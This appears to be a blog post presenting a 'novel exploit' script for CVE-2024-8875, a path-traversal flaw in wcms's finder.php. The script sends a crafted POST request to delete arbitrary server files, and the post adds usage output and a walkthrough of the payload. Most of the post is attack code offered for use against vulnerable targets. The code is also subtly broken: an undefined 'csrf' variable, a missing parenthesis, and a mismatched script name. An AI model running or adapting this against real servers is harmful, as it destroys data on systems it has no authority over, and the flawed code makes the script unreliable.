Novel Exploit — Arbitrary File Deletion in WCMS (CVE-2024–8875)

by@secatgourity

OS

Kali LinuxKali

2024.1.*

2020.3.*

2019.4.*

Apps

0.1.2.1.*

0.0.6.1.*

0.1.6.*

0.1.8.*

0.1.7.*

0.2.8.*

0.2.9.*

0.0.9.*

0.2.7.*

0.1.4.*

Screenshots from the blog posts

Summary

In this post, we will explore an arbitrary file deletion vulnerability in Wcms (CVE-2024–8875). We will understand the exploit and use the novel exploit to exploit vulnerable targets and delete the files of our choosing (if the process permissions allow).

1. import argparse
2. import requests
3. import urllib3
4. # Disable SSL verification warning for simplicity
5. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
6. def validate_url(url):
7. if not url.startswith(“http://”) and not url.startswith(“https://”):
8. raise ValueError(“Invalid URL schema. Use ‘http://’ or ‘https://'.")
9. def exploit(url, path):
10. session = requests.Session()
11. session.get(f”{url}/wcms/wex/finder.php?p=”, timeout = 10, verify = False)
12. try:
13. response = requests.post(f”{url}/wcms/wex/finder.php?p=”,
14. data = {
15. “p”: csrf,
16. “group”: “1”,
17. “file[]”: path,
18. “delete”: “Delete”
19. }, timeout = 5, verify = False)
20. if response.status_code == 302:
21. print(“[*] Specified file has been deleted (if the path was correct) and the
22. target was vulnerable to CVE-2024–8875.”)
23. return
24. except requests.RequestException as e:
25. print(f”[-] LOG: An error occurred during the exploitation: {e}”)
26. print(“[-] The wcms instance seems NOT to be vulnerable to CVE-2024–8875.”)
27. def main():
28. parser = argparse.ArgumentParser(description=”Novel exploit for CVE-2024–8875.”)
29. parser.add_argument(“ — url”, required = True, help = “URL to send requests to.”)
30. parser.add_argument(“ — path”, required = True, help = “File to be deleted (e.g. ../../path/to/file).”)
31. args = parser.parse_args()
32. validate_url(args.url
33. exploit(args.url.rstrip(“/”), args.path)
34. if __name__ == “__main__”:
35. main()

Description

Introduction

A vulnerability classified as critical was found in vedees wcms up to 0.3.2. Affected by this vulnerability is an unknown functionality of the file /wex/finder.php. The manipulation of the argument p leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Reference: https://nvd.nist.gov/vuln/detail/CVE-2024-8875

Exploitation Script Usage

```
kali@kali:/tmp$ python3 exploit.py -h              
usage: exploit.py [-h] --url URL --path PATH

Novel exploit for CVE-2024-8875.

options:
  -h, --help   show this help message and exit
  --url URL    URL to send requests to.
  --path PATH  File to be deleted (e.g. ../../path/to/file).
                                                                                                                              
kali@kali:/tmp$ 
```

Exploiting Vulnerable Targets

python3 detection.py --url http://vuln.wcms.local

Understanding exploitation script

The exploitation script works as follows:

1. Read user input (the URL to target and the path to the file to be deleted).
2. The supplied URL is then validated.
3. If the URL is valid, it is passed to the exploit() function along with the path to the file to be deleted.
4. Next, a GET request is sent to the target to get the session id (PHPSESSID).
5. Next, a POST request to delete a file is sent to the target (in the same HTTP request session).
6. The following payload is sent in the POST request p=&group=1&file%5B%5D=PATH_OF_FILE_TO_BE_DELETED&delete=Delete.
7. The file[] parameter contains the path of the file to be deleted.
8. If the target is vulnerable, the provided file is deleted from the server and it can be verified by checking the server files

Tags

#trendingCVE#open-source#php#novel#security-trends#novel-exploit#path-traversal#arbitrary-file-deletion#wcms